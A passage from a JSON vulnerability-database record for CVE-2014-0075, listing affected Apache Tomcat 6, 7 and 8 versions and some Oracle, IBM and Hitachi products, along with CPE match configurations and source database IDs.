        "version": "7.0.36"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "8.0.3"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.35"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.13"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.20"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.18"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.19"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.26"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.4"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.14"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.1"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.34"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.15"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.21"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.24"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.41"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.6"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.29"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.3"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.39"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.30"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.10"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.49"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.40"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.33"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.47"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.8"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.20"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.14"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.23"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.10"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.0"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.11"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.12"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.17"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "8.0.0"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.0"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.16"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.26"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.5"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.5"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.4"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.24"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.27"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.37"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.15"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.38"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.3"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.13"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.42"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.48"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.27"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.2"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.17"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.50"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.18"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.1"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.8"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.12"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.28"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.22"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.43"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.7"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.9"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.2"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.19"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.32"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.7"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.16"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.9"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0.11"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.6"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "6.0"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.44"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "8.0.1"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.52"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.46"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apache",
        "version": "7.0.45"
      },
      {
        "model": "fusion middleware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle enterprise data quality 9.0.11"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "6.0.1.2"
      },
      {
        "model": "rational lifecycle integration adapter",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "for hp alm 1.0 to  1.1"
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle secure global desktop 4.63"
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle secure global desktop 4.71"
      },
      {
        "model": "communications policy management",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "12.1.1 and earlier"
      },
      {
        "model": "rational build forge",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "7.1.2"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "jp1/cm2/network node manager",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "i"
      },
      {
        "model": "tomcat",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "apache",
        "version": "7.x"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "6.0"
      },
      {
        "model": "tomcat",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "apache",
        "version": "8.x"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "9.9.1"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "6.0.1.1"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "6.0.1.3"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apache",
        "version": "8.0.4"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "6.0.1"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "10.4.1"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "6.0.1.4"
      },
      {
        "model": "jp1/cm2/network node manager",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "i advanced"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apache",
        "version": "7.0.53"
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle secure global desktop 5.1"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "9.7.3"
      },
      {
        "model": "fusion middleware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle enterprise data quality 8.1.2"
      },
      {
        "model": "urbancode release",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "6.0.0.1"
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle secure global desktop 5.0"
      },
      {
        "model": "tomcat",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "apache",
        "version": "6.0.39"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002698"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-585"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0075"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.2:beta:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.49:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.4:beta:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.39:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.46:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.50:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.48:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.0:beta:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.44:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.52:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.42:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.37:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.45:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.47:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.41:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.36:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.43:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.38:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.40:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:7.0.33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:8.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:8.0.0:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:8.0.0:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:8.0.0:rc10:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:8.0.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:8.0.0:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.0:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.4:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "6.0.39",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.9:beta:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.1:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.7:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.37:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.6:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.2:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.7:beta:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.2:beta:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.8:alpha:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
